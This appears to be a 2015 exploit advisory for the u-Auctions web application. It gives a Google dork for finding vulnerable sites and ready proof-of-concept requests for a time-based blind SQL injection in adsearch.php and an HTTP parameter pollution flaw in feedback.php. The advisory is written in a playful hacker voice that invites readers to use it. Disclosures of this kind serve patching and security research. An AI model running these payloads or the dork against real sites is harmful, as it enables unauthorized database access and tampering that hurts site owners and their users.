# Exploit Title: *u-Auctions Multiple Vulnerabilities* # Google Dork: "*Powered by u-Auctions** ©*" # Date: *03 April 2015* # Exploit Author: *Don* # Vendor Homepage: https://www.*u-auctions.com */ # Version: *ALL* # Tested on: *Debian* *1. Blind SQL injection*: This vulnerability affects */adsearch.php* URL encoded POST input *category* was set to *(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/* *POC:* *http://www .targetsite.com /adsearch.php=action=search&buyitnow=y&buyitnowonly=y&category=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&closed=y&country=Afghanistan&csrftoken=59b61458fbbb4d6d44a4880717a3350a&desc=y&ending=1&go=GO%20%3E%3E&maxprice=1&minprice=1&payment%5b%5d=paypal&seller=1&SortProperty=ends&title=Mr.&type=2&zipcode=94102* *Done* *+-------------------------------------------------------------------------------------------------------------------------------------+* *2. HTTP parameter pollution* This vulnerability affects /*feedback.php* URL encoded GET input *id* was set to *1&n903553=v972172* Parameter precedence: *last occurrence* Affected parameter: *user_id=1* The impact depends on the affected web application. *An attacker could*: *1* = Override existing hardcoded HTTP parameters *2* = Modify the application behaviors *3* = Access and, potentially exploit, uncontrollable variables *4* = Bypass input validation checkpoints and WAFs rules POC: *http://www .targetsite.com /feedback.php?faction=show&id=1%26n903553%3dv972172* *Done* *+-------------------------------------------------------------------------------------------------------------------------------------+* *There is XSS too but I don't see it useful for anything, so will skip it.* *Cheers folks, Don (Balcan Crew) is back! :)* *Have fun and have friends!* *Shouts to my good friends from past / whoever is online / this website and new kids from the localhost.* *~Don 2015*